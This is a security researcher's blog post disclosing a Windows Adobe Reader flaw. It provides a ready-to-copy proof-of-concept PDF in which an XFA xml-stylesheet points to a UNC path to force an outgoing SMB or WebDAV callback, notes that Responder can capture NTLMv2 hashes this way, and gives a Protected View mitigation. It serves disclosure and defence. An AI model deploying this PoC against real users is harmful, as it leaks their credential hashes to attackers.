Saturday, January 26, 2019

Adobe Reader - PDF callback via XSLT stylesheet in XFA

I have seen on twitter that there is use for another PDF callback Proof-of-Concept in Adobe Reader.
Last year a PDF file called "BadPDF" was created, which allowed to trigger a callback to an attacker controlled SMB server and leak the users NTMLv2 hash. The used technique was fixed by Adobe (CVE-2018-4993).

As you are reading this blog post you can already guess that I discovered another callback mechanism. Sadly I have no cool name for my PDF... ;)
Spoiler alert: It is not perfect but good enough for now.

Tested Version: Adobe Acrobat Reader DC 19.010.20069
OS: Windows

The callback: xml-stylesheet in XFA structure

Once again the XML Form Architecture (XFA) structure helped.
XFA is a XML structure inside a PDF, which defines forms and more. This time it is not even necessary to use a feature of the XFA form but instead a xml-stylesheet does the trick.
Adobe Reader actually detects any http/https URLs specified in a xml-stylesheet element and asks for the user's confirmation. This dialog can be simply bypassed by using UNC paths.

I think the PoC should explain how the leak works (once again I used one of the many PDF templates of Ange Albertini)

!Notes about the PoC!

I could not find a way to actually get the specified XSLT sheet to be properly loaded. After the request is send (either via SMB or WebDAV) Adobe Reader always displays an "Access Denied" error.

Proof-of-Concept (Copy & Paste ready)

% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012

%PDF-1. % can be truncated to %PDF- 

1 0 obj <<>> 
<?xml version="1.0" ?>
<?xml-stylesheet href="\\\share\whatever.xslt" type="text/xsl" ?>
trailer <<
    /Root <<
        /AcroForm <<
            /Fields [<<
                /T (0)
                /Kids [<<
                    /Subtype /Widget
                    /Rect []
                    /T ()
                    /FT /Btn
            /XFA 1 0 R
        /Pages <<>>

SMB hashes

It is also possible to use this callback to capture the NTMLv2 hash via the Responder tool from SpiderLabs. The following screenshot shows the output of the tool as soon as the PDF is opened by Adobe Reader:

Mitigation option

To prevent the callback from happening it is necessary to enable the "Protected View" in Adobe Reader. This option it is available in Edit -> Settings -> Security (Advanced) -> Protected View: Enable for all files. In case this setting is enabled Adobe Reader will freeze when the PoC is opened but no request is send. Any "normal" PDF will just open fine.